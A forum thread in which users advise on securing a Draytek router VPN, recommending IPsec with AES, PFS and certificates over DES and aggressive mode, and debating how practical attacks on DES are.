What is the most secure way of setting up a VPN connection?
Ipsec/Des, SSL, one time password.

I require total security, encription, login etc.

Any advice, thanks.

There is no such thing as total security.

Go for IPSec with Perfect Forward Secrecy (PFS), ESP Security Method with AES and Authentication. If your router supports it (e.g. the 2950) use certificates rather than a pre-shared key (PSK). If you use a PSK use a strong one (long, random, mixed case with numbers and special characters).

Keep a mile clear of DES (apparently it can be cracked within a couple of days). 3DES is OK, AES is probably better.

I don't know much about SSL, but I would expect it to be fine with certificates.

Ultimately even stronger non-Draytek solutions are available. You can build your own Linux box and use Openswan for stronger encryption algorithms and there are a number of proprietary boxes which can also do the trick. TBH, you should be OK with the settings I gave you above on a Draytek.

Thanks.
Looked at SSL but the password side seemed thin compared to ipsec/aes, and you can not see the file structure unless you use Sambra.

The one time password works, but removes the ipsec during set up? Going to contact Draytek as to why?

Looked at certs but could not the 2955 to work with imported cert. Draytek are unsure why?

NJH wrote: Keep a mile clear of DES (apparently it can be cracked within a couple of days).

Wouldn’t the repeated failed attempts be noticed?

Noticed by what? Unless you are specifically monitoring for it in syslog? The Draytek will not raise the alarm in any other way. Also I don't know the crack mechanism. If it is sniffing passing traffic and then analysing it off line to work out the PSK, the first connection attempt it makes will be with the correct PSK.

Also keep clear of aggressive mode. This can be cracked, but again I've no idea how.

The best published attacks on DES still involve of the order of 2 ^ 40 keys to be tested.

This makes sense only with a known-plaintext attack, and even then only purpose built hardware will do it on any kind of meaningful timescale. With a PC - no way.

Also, most DES implementations use a session key, so the key is different anyway next time around...